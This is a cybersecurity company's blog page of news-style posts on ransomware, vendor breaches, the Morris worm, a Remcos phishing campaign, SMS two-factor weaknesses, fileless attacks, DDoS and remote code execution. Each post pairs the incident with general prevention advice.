Thought leadership. threat analysis, news and alerts.
Hard Lessons from a Ransomware Attack
A regional county municipality in the province of Quebec, Canada has learned the hard lessons about cybersecurity after it suffered a paralyzing ransomware attack.
Bernard Thompson, reeve of Mekinac regional county municipality, told The Canadian Pressthat the ransomware attack that paralyzed the municipality’s servers gave the municipality hard lessons in cybersecurity. “In the end, in terms of the security of our system, [the ransomware attack] was actually positive,” Thompson said.
The cyberattack against Mekinac's servers highlights the importance of protecting your organization's servers against ransomware attacks.
How the Mekinac Cyberattack Unfolded
The Canadian Press reported that on September 10, this year, municipal employees, upon returning to work after a weekend break, found a ransomware notice on their working computers, informing them that their files are locked. The ransomware notices also specified that in order to unlock the files, a total of 8 Bitcoins, then equivalent to $65,000, must be paid to the attackers.
The municipality’s servers were disabled for nearly 2 weeks as a result of the ransomware attack. The attack ended when the municipality negotiated and paid $30,000-worth of Bitcoin as ransom payment to unlock the locked files.
“It was hard, clearly, on the moral side of things that we had to pay a bunch of bandits,” Thompson said. He said this was the road that the municipality took as choosing the other way could mean months of data re-entry, costing significantly more than $30,000.
Mekinac’s ransomware attackers are still unidentified and their location not determined to date.
What is a Ransomware Attack?
Ransomware is a malicious software (malware) that encrypts files. Encryption is traditionally used to prevent data theft. In encryption, plaintext or any other form of data is converted from a readable format into an encoded version – a format that can only be readable if one has access to a decryption key.
In a ransomware attack, attackers convert the victim’s data from a readable format into an encoded version and demand from the victim ransom payment in exchange for the decryption key.
Ransomware infects computers or servers in many ways. Here are some of the ways that ransomware infects computers or servers:
1. Email-Based Attack
In the case of the Mekinac ransomware attack, the municipality’s servers were infected by a ransomware after an employee opened and clicked on a link in a malicious email sent by the attackers. It wasn’t specified, however, what particular ransomware hit the Mekinac’s servers.
The ransomware called “Locky” is an example of a ransomware that’s spread via email spam campaigns. This ransomware arrives in a victim’s computer through a Microsoft Office email attachment that evades antispam filters and tricks the user to open the attachment. Once this malicious attachment is clicked, Locky encrypts computer files and then demands the victim to pay a ransom to unlock the encrypted or locked files.
2. Drive-By Attack
Drive-by attack is another way by which attackers infect computers or servers. Bad rabbit ransomware is an example of a ransomware that’s distributed via drive-by attacks.
In a drive-by attack, attackers insert a malicious code, in this case, a ransomware, into an insecure website. Once a user visits this compromised site, the malware may either directly download to the visitor’s computer or the visitor is redirected to another website controlled by the attackers and from there the malware is downloaded to the victim’s computer.
3. Unpatched Servers
The ransomware called “SamSam” is an example of a ransomware that infects servers when they’re in an unpatched state. An unpatched server is one that isn’t updated despite the availability of a security update.
Researchers at Cisco Talos, in a blog post, wrote, “Adversaries are exploiting known vulnerabilities in unpatched JBoss servers before installing a web shell, identifying further network connected systems, and installing SamSam ransomware to encrypt files on these devices.”
Lessons from Ransomware Attacks
Thompson, reeve of Mekinac regional county municipality, said that the ransomware attack on Mekinac’s servers taught the municipality to encrypt everything and to analyze every email. “Everything is encrypted now,” Thompson said. “Every email is analyzed before we even receive it. Every day, our system catches malicious emails trying to penetrate – but they are stopped. But the attacks keep coming.”
In addition to encryption and email scanning, here are additional best practices in order to protect your organization’s servers from ransomware attacks:
Back Up Important Files
Back up files that are stored in safe storages that aren’t connected to your organization’s servers give your organization assurance that if anything happens with the servers, for instance, a ransomware attack, your organization will still have other copies of the important files. This eliminates the pressure of paying ransom to attackers for the decryption key to unlock the locked files.
Keep All Software Up-To-Date
Make sure that all your organization’s software, specifically the server operating system, are up-to-date. Every security update or patch issued by software vendors contains fixes of security vulnerabilities that cybercriminals are quick to exploit.
Implement Domain Whitelisting
Whitelisting certain domains won’t prevent drive-by download attacks, but it’ll prevent secondary malicious websites from loading.
Limit the Number of Users with Administrator Privileges
A computer user with administrator privileges can install and uninstall software and change configuration settings. Limiting this privilege to a limited number of personnel limits the exposure of your organization’s servers to drive-by attacks.
When your organization needs help, our experts are a phone call away. Contact ustoday to prevent ransomware attacks.
Why the Pentagon Data Breach is a Wake-up Call for Better Screening of Third-party Vendors
On October 14 2018, news of a major data breach at the Pentagonhit the headlines.
This was a startling, even disturbing, reminder that even the most important, most secure institutions in the world are vulnerable when hackers identify a way into their systems. As the Department of Defense’s headquarters, the Pentagon plays a critical role in the United States military and national security: it oversees all aspects of the Air Force, Marines, Army, Coast Guard and Navy, ultimately helping to defend the country.
The very notion that a global symbol of security and power would fall prey to a data breach has surprised many,but it shouldn’t have. At a time when cyber-criminals continue to employ increasingly-sophisticated techniques to disrupt business and organizations of all kinds, this incident is proof positive that proper screening of third-party vendors is critical for effective cybersecurity.
What Data was Involved in The Pentagon Breach?
It’s believed as many as 30,000 employees’ travel records were compromised as a result of the data breach. This includes personal details and credit-card data pertaining to civilians and military personnel: all sensitive information that could have serious financial repercussions if acted upon.
The breach may have first occurred months before it was discovered, and it’s believed the actual number of people potentially affected could rise as the investigation continues. However, no classified information is said to have been compromised.
How Did the Pentagon Breach Happen?
The Pentagon breach was the result of workconducted by a ‘single commercial vendor’, delivering its service to a ‘very small percentage’ of the DoD’s employees. The vendor in question has remained anonymous and was, in the days after the announcement, still contracted to provide its services.
News of the breach struck after the U.S. Government Accountability Office confirmed that work had been undertaken to secure the Pentagon’s networks, though its weapons system security was under closer scrutiny. They claimed they face more and more challenges in keeping weapons systems secure, due to the rise of sophisticated cyber-crime tactics.
Pentagon personnel have faced similar issues before. A large attack on the federal Office of Personnel Managementin 2015 left the personal details of over 21 million individuals (including people at the Pentagon) compromised. As with this latest incident, the 2015 attack supposedly first occurred months before word of it reached the media.
Who was Responsible for The Pentagon Breach?
One or more attackers seized an opportunity to exploit the vendor’s access to the Pentagon’s network, ultimately stealing the travel records. Little else is known.
This incident, though, is a prime example of how ambitious (or, rather, brazen) cyber-criminals are in their choice of targets. While some may focus on distributing ransomware to small businesses in exchange for payment, others are clearly setting their sights a little higher.
The tools and technology available to such individuals empowers them to exploit weaknesses in even those systems that should be the most airtight in the world. While the exact circumstances surrounding the vulnerability created by the vendor remain secret, it’s no doubt the company responsible is determined to avoid such an oversight happening again.
It’s also highly likely that the vendor has a strong reputation and valuable experience to have even secured the contract with the Department of Defense in the first place.
This entire incident demonstrates why it’s so vital for businesses and organizations of all sizes, in all sectors, to perform thorough screening of any vendors they intend to work with.
Screening Vendors, Protecting Your Business
No business or organization should ever start working with a vendor without checking their credentials and their background.
Simply settling on the first firm on your radar may not deliver the results you expect — and any mistakes or general incompetence on their part could have major repercussions. You might not have data pertaining to thousands or even millions of civilians in your records, but you could still be risking your customers’ and employees’ privacy by choosing a sub-par team.
If a data breach were to rock your company or organization, the damage could be extensive. First and foremost, those customers whose details have been compromised would be incredibly unlikely to keep working with you in the future.
Fast, effective action can help to minimize the fallout and keep their finances safe from unauthorized access, but their perception of your brand would still be soured.
Your reputation would be affected too, making it more difficult to build trust with new customers or affiliates. That’s not to mention the sheer disruption a breach could cause to your everyday operations, leaving you unable to deliver the services your customers expect for hours, days or longer.
This equates to a potential loss of business and, sadly, income.
Undertaking effective, in-depth screening of your vendors is the smart choice.
Look into any reviews you can find online to learn more about the quality of service previous clients have received. Did they perform as required? Did they use the right processes and achieve the goals they set out to with respect for the client’s security needs?
You may consider approaching some of these clients to get a deeper insight into their experience.
Make sure to speak with prospective vendors at length, to get a better idea of how they work, what security measures they take to safeguard systems against breaches and more. You can only ask so many questions and ask for so many examples of their prior work before making your decision but doing your research will help ensure the safest choice for your business or organization.
At The Driz Group, we’re committed to helping our clients stay protected and compliant, minimizing the risk of cyber-attacks using the latest, automated third-party screening technologies. Want to learn more about what we can do for you? Just get in touch!
Look Back into the First Major Cyberattack: The Morris Worm
Thirty years ago, the Morris worm, dubbed as the first major cyberattack, was unleashed into the wild, crashing or slowing to a crawl 10% or 6,000 of the 60,000 computers then connected to the “Internet”.
What Is Morris Worm?
Morris worm is named after its creator Robert Tappan Morris. A worm, meanwhile, refers to a type of malicious software (malware) that has the ability to spread itself within networks without user interaction.
Courtdocuments showed that Morris, then a first-year graduate student at Cornell University's computer science Ph.D. program, released the worm on November 2, 1988 through a computer at the Massachusetts Institute of Technology (MIT), which Morris hacked using a Cornell University's computer.
Morris worm was released into the wild a year before the world wide web came into existence. The term “Internet” then referred to a U.S. computer network, composed of connected computers from prestigious colleges, research centers, governmental and military agencies.
In less than 24 hours on November 2, 1988, Morris worm infected the computers of institutions, including Harvard, Princeton, Stanford, Johns Hopkins, National Aeronautics and Space Administration (NASA) and the Lawrence Livermore National Laboratory.
While the worm didn’t destroy or damage files, infected computers slowed to a crawl or ceased functioning and emails were delayed for days. The estimated cost of dealing with the Morris worm at each installation ranged from $200 to over $53,000.
The worm infected computers running a specific version of the Unix operating system in 4 ways:
First, via a security vulnerability in “SEND MAIL”, a computer program that transfers and receives electronic mail;
Second, via a security vulnerability in the "finger demon", a computer program that allows extraction of limited information about the users of another computer;
Third, via "trusted hosts" feature that allows a user with certain privileges on one computer to have equivalent privileges on another computer without using a password; and
Fourth, via a program that guesses passwords using various combinations of letters tried out in rapid succession, hoping that one will be an authorized user's password. When the correct password is entered, the intruder is allowed whatever level of activity that the user is authorized to perform.
Morris designed the worm to stay hidden. The worm was designed in such a way that it won’t copy itself onto a computer that already had a copy. The worm was also designed in such a way that it would be killed when a computer was shut down.
Consequences of the Morris Worm
For unleashing the worm into the wild, Morris became the first person convicted for violating the U.S. Computer Fraud and Abuse Act, which outlaws unauthorized access to protected computers. He was sentenced to 3 years of probation, 400 hours of community service, a fine of $10,050 and the costs of his supervision.
The first major cyberattack perpetrated by the Morris worm showed how vulnerable interconnected computers had become. Just days after the Morris worm attack, the U.S. Government created the country’s first computer emergency response team under the direction of the Department of Defense. Developers also began creating intrusion detection software.
On the flip side, the Morris worm inspired a new breed of malicious hackers, plaguing the digital age. In recent memory, the worm that resembles the devastation caused by Morris worm is the WannaCry worm, commonly known as WannaCry ransomware.
In less than 24 hours on May 12, 2017, more than 300,000 computers in 150 countries were infected by WannaCry, each demanding a ransom payment. WannaCry is categorized as a worm as similar to the Morris worm as it has the ability to spread itself within networks without user interaction.
WannaCry specifically exploited the security vulnerability in Server Message Block Protocol (SMB protocol) in some versions of Microsoft Windows. SMB protocol allows users to access files, printers and other resources on a network.
Here are some cybersecurity measures to protect your organization’s computers or networks from worms similar to WannaCry and Morris worms:
Implement Network Segmentation
In network segmentation, vital computers that housed critical information and operations are separated or disconnected from computers connected to vulnerable systems like the public internet. Network segmentation ensures that when internet-facing computers are infected by a worm, these vital computers aren’t affected.
Keep All Software Up-to-Date
Make sure that software security updates are installed as timely as possible, not months or years after the release dates of the security updates.
Cyberattackers have automated the process of scanning the internet for finding vulnerable computers – those that fail to install security updates. This was the case for WannaCry victims as they failed to install the security update issued by Microsoft months before the WannaCry cyberattack.
Refrain from Using Legacy Hardware and Software
The term “legacy” refers to old and outdated computer hardware or software. Similar to computers that fail to timely install security updates, legacy hardware and software programs are similarly targetted by cyberattackers as these legacy hardware and software programs no longer receive security update from their vendors.
Some versions of the Microsoft Windows (Windows XP, Windows 8, and Windows Server 2003 operating systems) were targeted by WannaCry attackers as well as during the attack these software programs were no longer supported by Microsoft. A day after the WannaCry attack, however, Microsoft released security updates for Windows XP, Windows 8, and Windows Server 2003.
Protecting computers or networks from worms and other malicious software is important in order to prevent data breaches. Under Canada’s Digital Privacy Act, starting November 1 this year, private organizations are mandated to notify the Privacy Commissioner of Canada and the affected individual “as soon as feasible” in the event that a data breach poses a “real risk of significant harm” to any individual.
When you need help assessing and mitigating the cybersecurity risks, contact out team of expertsand minimize the likelihood of a data breach.
Latest Phishing Campaign Attempts to Install Remcos Remote Access Tool into Victims' Computers
Thousands of Icelanders have been targeted in the latest phishing campaign that attempts to install the Remcos remote access tool into the victims' computers, this according to the recent report by Cyren.
While the actual victims may seem low, Cyren said, this could be the largest cyberattack to hit Iceland, a country with just close to 350,000 population.
Latest Phishing Attack Modus Operandi
Magni Reynir Sigurðsson, senior threat analyst at Cyren, reported that the phishing campaign targeting Icelanders, which has been observed since October 6th, begins with an email impersonating the Lögreglan – Icelandic police. The email requests the recipient to come to the police station for questioning. The email also threatens the recipient that an arrest warrant may be issued in case of non-compliance.
The attackers registered the domain name www[dot]logregian[dot]is. This domain name, on the first glance, is very similar to the official domain name of the Icelandic police www[dot]logreglan[dot]is. The only difference is that the “l” in the official site is changed to “i”. Buying this similarly named domain enables the attackers to send emails with sender address ending in “logregian[dot]is”, which on the first glance, closely resembles the emails from the official Icelandic police ending in “logreglan[dot]is”.
The link provided in the phishing email that purportedly leads to additional information about the case leads to the phishing site www[dot]logregian[dot]is that strikingly resembles the official site of the Icelandic police www[dot]logreglan[dot]is.
In the phishing site, the victim is asked to provide an Icelandic social security number. Unlike other phishing sites which can be fooled by entering wrong data, this phishing site knows whether the victim is entering the wrong social security number or not. When a wrong number is entered, an error alert is shown, and when the number entered is correct, this leads to a new phishing webpage that displays the victim's actual name. Sigurðsson hypothesized that the phishers used a database, containing Icelanders’ social security numbers and actual names, that was leaked years ago.
Being able to match the social security number with actual name further give credence to this phishing campaign. To give further credence to this campaign, the attackers ask the victim to enter the authentication number contained in the email that was sent to him.
Entering the authentication number leads the victim to another phishing webpage that automatically downloads a .rar file that purportedly contains additional document about the case. When this .rar file is extracted, a .scr file (Windows Screensaver) disguised as a Word document with file name “Boðun í skýrslutöku LRH 30 Óktóber.scr”, roughly translated to English as “Called in for questioning by the police on October 30th” is shown.
When this disguised Word document is executed, a file called “Yfirvold.exe” and “Yfirvold.vbs” are dropped into the victim's computer. Sigurðsson said that the Yfirvold.vbs file is placed in the Windows Startup folder so that in case the victim reboots his computer the .vbs script will execute Yfirvold.exe – a malware that uses the code and components from a known remote access tool called “REMCOS”.
What Is REMCOS?
REMCOS stands for Remote Control & Surveillance Software. This software is sold online by the company called “Breaking Security”. Remcos’ price ranges from €58 to €389. Buyers of Remcos can also pay using a variety of cryptocurrencies.
Breaking Security markets Remcos as a legitimate software that allows users to remotely control and monitor Windows operating system, from Windows XP and all versions thereafter, including server editions. In addition to selling Remcos, Breaking Security also offers Octopus Protector, keylogger and mass mailer. Octopus Protector encrypts a file laden with malware on the disk, allowing it to bypass several antivirus protections. Keylogger records and sends the keystrokes made on a computer, while a mass mailer sends large volumes of emails.
In the case of the phishing attack targeted against thousands of Icelanders, according to Sigurðsson, the Remcos that’s installed into the victims’ computers comes with keylogging capability, collecting input from the victims’ keyboards and storing them in logs and then uploading them to the command and controller servers controlled by the attackers. These servers, Sigurðsson said, are located in Germany and Holland.
The Remcos that’s installed into the victims’ computers in the Iceland phishing attack also comes with a fact checker that checks if the victims are accessing the largest online banks in Iceland. According to security researcher MalwareHunterTeam, this fact-checking capability is a selective keylogger feature of Remcos.
According to researchers at Cisco Talos, Remcos was also used to attack international news agencies, diesel equipment manufacturers operating within the maritime and energy sector, and HVAC service providers operating within the energy sector.
"Since Remcos is advertised and sold on numerous hacking-related forums, we believe it is likely that multiple unrelated actors are leveraging this malware in their attacks using a variety of different methods to infect systems,” researchers at Cisco Talos said.
Similar to the phishing attack targetting Icelanders, the cyberattacks mentioned by Cisco Talos started with a phishing email, purportedly coming from a government agency and comes with an attached document.
Embedded into the attached document is a small executable. “The extracted executable is simple and functions as the downloader for the Remcos malware,” Cisco Talos researchers said. “It is a very basic program and is used to retrieve Remcos from an attacker-controlled server and execute it, thus infecting the system.”
While the company behind Remcos claims that its software is meant for legitimate use, data in the wild, including the cyber incidents reported by Cyren and Cisco Talos demonstrate that Remcos is being used by malicious actors.
Remcos is a powerful remote access tool that’s being regularly modified to include new functionalities to remotely control and monitor any Windows operating system.
Make sure that your organization is implementing security measures to combat Remcos and another phishing modus operandi.
When you need help, we are a phone call away. Connect with ustoday and protect your business.
Reddit Data Breach Highlights Weaknesses of SMS-Based 2-Factor Authentication
Reddit recently announced that it succumbed to a cyberattack, an attack that was born out of the weaknesses inherent to SMS-based 2-factor authentication (2FA).
Reddit, in a statement, said that an attacker managed to access the company’s complete copy of a database backup containing user data starting from the site’s launch in 2005 up to May 2007. The data accessed during this period include passwords of users and public and private messages.
The company added that email address of current users, source code, internal logs, configuration files and other employee workspace files have also been accessed by the attacker.
While acknowledging that the recent cyberattack was a serious attack, according to Reddit, the attacker didn’t do much damage to the site itself as the attacker only gained read-only access, not write access to Reddit systems.
Reddit said that the attacker entered the company’s systems as a result of the weaknesses inherent to SMS-based 2FA. “Already having our primary access points for code and infrastructure behind strong authentication requiring two factor authentication (2FA), we learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept,” Reddit said.
What Is Two-Factor Authentication (2FA)?
Two-Factor Authentication, also known as 2FA, is an added layer of protection that’s meant to ensure that security of online accounts goes further than a username and a password.
Here are the 3 most common types of 2FA or security keys for securing your online accounts:
1. SMS-Based 2FA
In SMS-based 2FA, whenever you log-in to your online account, after entering your username and password, a verification code will be sent in a form of an SMS message to your mobile phone. Once the correct verification code is entered after entering the correct username and password, you’ll then gain access to your online account.
In the case of the Reddit cyberattack, it wasn’t disclosed how the attacker carried out the "SMS intercept".
The publicly known scenario for SMS intercept is via SIM swapping, also known as SIM hijacking. In SIM swapping, an attacker calls a cell phone carrier’s tech support pretending to be the target victim and claims that the target’s SIM card is lost. The attacker then requests that the phone number of the target be transferred (also known as ported) to a new SIM card that the attacker already owns.
The attacker in this scam convinces the phone carrier’s tech support to make the necessary transfer of phone number to a new SIM card by providing the target’s personally identifiable information, including Social Security Number or home address, details that are available online after many data breaches from other companies in the past.
Once an attacker convinces the phone carrier’s tech support for the SIM-swap, it’s game over for the target. The immediate effect is that the target loses phone service and any 2FA verification code delivered via SMS is sent to the new SIM card that the attacker controls.
2. App-Based 2FA
In app-based 2FA, you need to download an app, such as Google Authenticatoror Authy, to your mobile phone or PC. Once installed and configured, you can get the verification code, after entering your correct username and password, through your device.
Unlike the SMS-based 2FA, you can still get the verification code when your phone service gets shut off. The downside of app-based 2FA is that the verification code needs to be entered into the same login page on a website along with the username and password. This allows cyberattackers to subvert the username, password and verification code by cyberattacks such as phishing and man-in-the-middle.
In a phishing attack, a user is duped into revealing sensitive data, including username and password. In man-in-the-middle attack, the attacker positions himself in a conversation between a user and an application, making it appear as if a normal exchange of information is conducted.
3. Hardware-Based 2FA
Hardware-based 2FA, also known as physical security key, comes in the form of a USB device. Login process can be completed by inserting the USB device to the USB port and by pressing a button in the USB device, eliminating the need for retyping verification codes. This is also meant to verify that you’re not a remote malicious hacker.
Unlike the SMS-based 2FA and app-based 2FA, in hardware-based 2FA, you don’t need your mobile phone to access your online accounts.
Yubico, the most popular maker of hardware-based security keys, sells its basic model for only $20. Last month, Googleannounced that its own hardware-based security keys called “Titan Security Keys” are available to Google Cloud customers and will soon be available for anyone to purchase on the Google Store.
Last month also, Google told cybersecurity journalist Brian Krebsthat since early 2017, more than 85,000 of its employees have been using physical security keys. Since then, the tech giant said that 85,000+ of its employees haven’t fallen prey to phishing attacks on their work-related accounts.
Google said that Titan Security Keys enhanced protection against phishing as the “2-step verification with a security key uses cryptography to provide two-way verification: it makes sure you're logging into the service you originally registered the security key with, and the service verifies that it's the correct security key as well”.
The downside of having physical security keys is that it’s a security risk to carry these devices around as once attackers get hold of them, it’s also game over for the targets. Physical security keys, therefore, have to be kept in a safe and secure place.
When you have questions concerning your options of better protecting mission critical data, our experts are a phone call away.
Fileless Cyberattacks: They're Getting More Widespread and They're Working
Reports from Ponemon Institute and McAfee Labs have shown that fileless cyberattacks are getting more widespread and they're working.
What Are Fileless Cyberattacks?
Fileless cyberattacks, also known as zero-footprint attacks, refer to cyberattacks that are meant to evade detection by avoiding to install at one stage or another malicious software (malware) on the victims’ computers.
McAfee Labsreported that there’s a significant shift by some cyberattackers toward exploiting trusted Microsoft’s proprietary programs, rather than installing external malware, to attack computers or office computer networks.
In the Ponemon Institute’s study “The 2017 State of Endpoint Security Risk”, researchers found that 77% of successful cyberattacks in 2017 used fileless techniques. The study found that fileless attacks are almost 10 times more likely to succeed than file-based attacks.
The terms “fileless” and “zero-footprint” are misnomers. Fileless cyberattacks don’t mean that they’re exclusively fileless at every stage. For instance, the attack may start with the opening of a malicious file to a spam email and once the infection starts though, the attackers may shift to fileless techniques.
Attackers can also gain access to victims' computers by compromising the victims' computers filelessly at the beginning of the attacks, for instance, by exploiting a security vulnerability that's unpatched and then once access is achieved, external malware is then installed.
Fileless cyberattacks aren’t also necessarily “zero-footprint” because fileless cyberattacks do leave traces on the victims’ computers if one knows where to look.
There’s, however, justification to the name “fileless cyberattacks” as these attacks don’t exhibit the usual symptoms normally associated with malware infection on the computer disk. As they’re asymptomatic, they’re hard to detect and as such, traditional anti-virus solutions can’t detect them.
Instead of installing the malware into the computer disk, what a fileless attack does is embed the malware in scripts or install the malware into the computer memory and never gets copied to the disk, thereby bypassing endpoint security measures such as anti-virus, which typically rely on file input/output to detect threats.
Examples of Fileless Cyberattacks
Below are examples by which attackers infect victims’ computers filelessly:
1. Fileless Cyberattacks via Microsoft’s Windows PowerShell
One of the ways by which attackers infect victims’ computers filelessly is via Microsoft’s Windows PowerShell.
Microsoft’s Windows PowerShell is Microsoft’s task automation and configuration management framework. Available on Windows 7 onward, Microsoft PowerShell allows full access to Microsoft COM (Component Object Model) and Microsoft Windows Management Instrumentation (WMI). Attackers can access Windows features using Microsoft PowerShell.
One preventive measure in protecting Microsoft PowerShell from fileless cyberattacks is by setting it to "Restricted". According to McAfee Labs, attackers can easily get around this restriction by performing “remote execution of a script by directly executing it in memory to bypass endpoint security.”
System administrators bypass the Microsoft’s Windows PowerShell restriction, in the same manner, to execute commands on office computer networks from a remote location via the internet.
2. Fileless Cyberattacks via Microsoft’s Remote Desktop Protocol (RDP)
Another way by which attackers infect victims’ computers filelessly is via Microsoft’s Remote Desktop Protocol.
Microsoft’s Remote Desktop Protocol, just like Microsoft’s Windows PowerShell, is a proprietary software developed by Microsoft. And just like PowerShell which is primarily used by system administrators, Remote Desktop Protocol is also used by systems administrators to access other computers or office computer networks from a remote location via the internet.
Attackers gain access to victims' computers via Microsoft’s Remote Desktop Protocol by simply guessing their way past weak passwords or by using popular password cracking tools. McAfee Labsreported that thousands of these Remote Desktop Protocol login details (specifically for Windows XP through Windows 10 and Windows 2008 and 2012 Server) are sold online between $3 to $19.
Once attackers gain access to your organization’s computer network via Remote Desktop Protocol, they can do anything with it such as install any malware of their choice.
In both fileless cyberattacks via Microsoft Windows PowerShell and Microsoft Remote Desktop Protocol, once attackers gain access into victims’ computers, they’re viewed as system administrators, masking the identity of the attackers, allowing them to hide in plain sight.
PowerGhost is a cryptocurrency mining malware – a malicious software that hijacks the processing power of victims’ computers. Kaspersky Lab first identified this malware.
This malware spreads across large corporate networks infecting both workstations and servers by using a number of fileless techniques, including Mimikatz, a hacking tool designed to siphon a Windows user's password out of the computer's memory.
PowerGhost propagates itself across the local network by launching a copy of itself via Microsoft’s Windows PowerShell and via the now-notorious EternalBlue exploit – a spy tool believed to be developed by the US National Security Agency (NSA) and leaked by the hacking group Shadow Brokers in April 2017. On March 14, 2017, a month before Shadow Brokers leaked the EternalBlue code, Microsoftreleased a security update or patch fixing the security vulnerability exploited by EternalBlue.
Prevention against Fileless Cyberattacks
As shown in the above-mentioned examples, attackers use a number of techniques for fileless attacks. Here are some of the preventive measures against fileless attacks:
By keeping your software up-to-date, your organization’s computer network won’t be vulnerable against EternalBlue exploit.
When you are looking to boost staff awareness and better protect your applications and infrastructure, get in touchand we will be happy to help.
DDoS Attacks: Protecting Your Business from Critical Disruption
In March 2018, developer platform GitHub was struck by the most powerful DDoS (distributed denial-of-service) attack ever recorded.
How big? 1.35 terabits of traffic was hitting GitHubeach second.
Still, GitHub was not without its defenses.
Within 10 minutes of the attack starting, GitHub’s DDoS mitigation service stepped in to combat it. They routed all incoming and outgoing traffic and scrubbed data, blocking all malicious packets responsible.
Such decisive action paid off. The attack ended eight minutes after the service took over, and GitHub was able to get back on track after just five minutes of downtime.
If GitHub had been without such a fast, effective response, the outcome of the attack might have been much worse.
A DDoS attack is a fairly cold-blooded attempt to disrupt a server, service or network’s standard operation by bombarding it with excessive traffic.
They incorporate a number of compromised computer systems to mount the attack, essentially overwhelming the target system and affecting genuine traffic.
GitHub had been targeted before, with an attack lasting for six days in 2015.
A company or organization’s website can be severely affected by a DDoS attack, potentially costing them lots of money in lost business. In fact, the average cost of a DDoS attack for businesses rose to more than $2.5 millionin 2017.
Research highlights just how common DDoS disruptions are for many companies. A staggering 849 of 1,010 enterprises questioned had been hit by a DDoS attack. DDoS disruption was estimated to cost target businesses as much as $100,000 per hour.
These figures make for disturbing reading, especially for smaller companies on a much tighter budget than their larger competitors. Still, even for global corporations, the risk of a DDoS attack can be incredibly troubling: after all, they may have more to lose.
Effective cybersecurity and preparation have never been more vital. Every cent available must be channeled into reinforcing your business against potential threats.
Still, this is easier said than done: cybercrime and security can be daunting. To help you understand how best to defend yourself against DDoS attacks, we have explored some of the most effective options below:
Get to know the symptoms
Recognizing the signs of an incoming DDoS attack can make a significant difference to how you handle it.
There is no real warning for a DDoS attack, though. While some hackers may issue threats, there will generally be nothing other than the assault itself.
As you might not browse your own website much on a day to day basis, it may not be until customers begin complaining about its performance than the warning bells start to sound.
However, certain other clues will tip you off:
The earlier you’re able to spot the warning signs, the sooner you can start to act.
Have a plan
Every business should have a plan in place for a potential DDoS attack. Once you confirm that your system has been targeted, you can jump to your plan and follow it. Being prepared helps to reduce the likelihood of panic or making mistakes that exacerbate the disruption.
Make sure all key players from each department are alerted to the situation and understand how best to handle it at their end. If everyone can work together and focus on damage limitation, you’re more likely to come out of the DDoS attack with minimal impact.
Companies that have no preparations for dealing with such a situation could waste valuable time trying to make sense of it.
Know how to prioritize
You will only have limited access to your system during a DDoS attack. Make sure you focus on keeping the most high-value services and applications running to preserve as much ‘normal’ function as possible.
Again, this comes down to planning. You should have an immediate idea which areas can be let go and which must be the priority.
Pay attention to your network security
Conducting security audits on your network on a regular basis is an effective way to keep your system protected.
Take a close look at the strength of passwords (particularly for the most vulnerable areas), review which employees have access to key data, and run comprehensive checks on software. Do you have the most up to date versions? Have any known security risks come to light with an application you’re using?
A network security audit may not be enough in itself to defend your business against a DDoS attack, but it can play a large part in the process. Incorporate this into ongoing workplace routines: make sure it becomes a habit and is never overlooked.
Letting your system go without the proper audits and preparations can leave it vulnerable to attack. Being complacent and assuming your business will escape the attention of cybercriminals is never a smart move.
Turn to the professionals
Your system security is paramount to keeping your business up and running. Not only does your entire flow of service depend on effective protection, so too does your customers’ experience.
Lengthy downtime can leave buyers with little choice but to start looking elsewhere if you cannot meet their needs. On top of this, they may wonder how safe their personal and financial data are within your company.
Hiring a professional cybersecurity firmto defend your system against DDoS attacks can help to take the strain. You will be free to focus on other areas of running your business while the experts handle the heavy lifting.
Are you concerned about your company’s vulnerability to DDoS attacks? What steps have you taken to safeguard your system? Share your thoughts and ideas below and contact ustoday to protect your organization.
What is Remote Code Execution Attack & How to Prevent this Type of Cyberattack
Microsoft recently rolled out its latest security update, fixing 50 security vulnerabilities. Out of the 50 security vulnerabilities fixed by Microsoft in its June 12thsecurity update, 14 security vulnerabilities allow remote code execution.
What is Remote Code Execution?
Remote code execution (RCE) refers to the ability of a cyberattacker to access and make changes to a computer owned by another, without authority and regardless of where the computer is geographically located.
RCE allows an attacker to take over a computer or a server by running arbitrary malicious software (malware). "RCE (remote code execution) vulnerabilities are one of the most dangerous of its kind as attackers may execute malicious code in the vulnerable server," Impervasaid.
Remote Code Execution Example #1: Microsoft Excel Remote Code Execution Vulnerability
One example of a remote code execution vulnerability is the CVE-2018-8248vulnerability – one of the security vulnerabilities fixed by Microsoft in its June 12thsecurity update. The CVE-2018-8248 vulnerability, also known as “Microsoft Excel Remote Code Execution Vulnerability”, allows an attacker to run a malware on the vulnerable computer.
The CVE-2018-8248 attacker could take full control of the compromised computer if the owner of the compromised computer logs on to the computer with administrative user rights. In taking full control of the compromised computer, the attacker could view, change or delete data; install programs; or create new accounts with full user rights.
According to Microsoft, the delivery method in exploiting the CVE-2018-8248 vulnerability could be in the form of a malicious email with an attachment that contains a specially crafted file with an infected version of Microsoft Excel. Another delivery method in exploiting the CVE-2018-8248 vulnerability is in the form of a web-based attack scenario, whereby an attacker could host a website or compromised website that accepts or hosts user-provided content containing a specially crafted file designed to exploit the CVE-2018-8248 vulnerability.
In the 2 scenarios, malicious email and web-based attack, the attacker has to convince users to click on the attachment or a link to open the specially crafted file. To date, there’s no report that CVE-2018-8248 vulnerability has been exploited into the wild.
Remote Code Execution Example #2: Microsoft Windows SMB Vulnerability
On May 12, 2017, hundreds of thousands of computers worldwide were infected by WannaCry, a malware that encrypts computer files, locking out computer users and asks for ransom payment to decrypt or unlock the computer files.
WannaCry, as it turns out, is a malware that allows remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block (SMB) – a protocol used for sharing access to files, printers and other resources on a network.
Unlike other remote code execution attacks which leverage on malicious emails and web-based attacks as delivery methods, WannaCry’s delivery method was scanning the internet for vulnerable SMB ports and using one of the alleged U.S. National Security Agency (NSA) spying tools called “EternalBlue”, which takes advantage of the vulnerability in Microsoft’s SMB. Once an attacker detects SMB vulnerability, the DoublePulsar (another alleged NSA spying tool) is then used by an attacker to allow for the installation of the WannaCry malware.
EternalBlue and DoublePulsar are 2 of the spying tools allegedly used by the NSA that were leaked in April 2017 by a group of hackers who called themselves Shadow Brokers. According to Microsoft, the security vulnerabilities exposed by Shadow Brokers were fixed by the security update released by the company in March 2017 – a month before Shadow Brokers publicly released the alleged NSA spying tools.
Researchers at Renditionreported that in late April and the first few days of May 2017 – several days after Microsoft issued a security update fixing the security vulnerabilities exposed by Shadow Brokers, more than 148,000 computers were compromised by EternalBlue and DoublePulsar.
